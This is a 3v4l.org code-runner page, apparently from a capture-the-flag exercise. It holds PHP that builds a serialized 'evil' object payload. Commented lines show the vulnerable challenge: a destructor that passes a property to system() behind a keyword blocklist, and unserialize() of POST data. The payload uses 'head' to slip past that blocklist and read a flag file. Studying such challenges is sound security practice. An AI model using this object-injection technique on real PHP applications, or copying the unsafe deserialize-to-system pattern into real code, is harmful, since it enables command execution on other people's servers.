3v4l.org

run code in 300+ PHP versions simultaneously
<?php //highlight_file(__FILE__); // Maybe you need learn some knowledge about deserialize? class evil { public$cmd="head /th1s_1s_fffflllll4444aaaggggg"; // public function __destruct() // { // if(!preg_match("/cat|tac|more|tail|base/i", $this->cmd)){ // @system($this->cmd); // } // } } $a=new evil(); echo serialize($a); //@unserialize($_POST['unser']); ?>
Output for 8.2.0 - 8.2.27, 8.3.0 - 8.3.15, 8.4.1 - 8.4.2
O:4:"evil":1:{s:3:"cmd";s:35:"head /th1s_1s_fffflllll4444aaaggggg";}

preferences:
42.4 ms | 406 KiB | 5 Q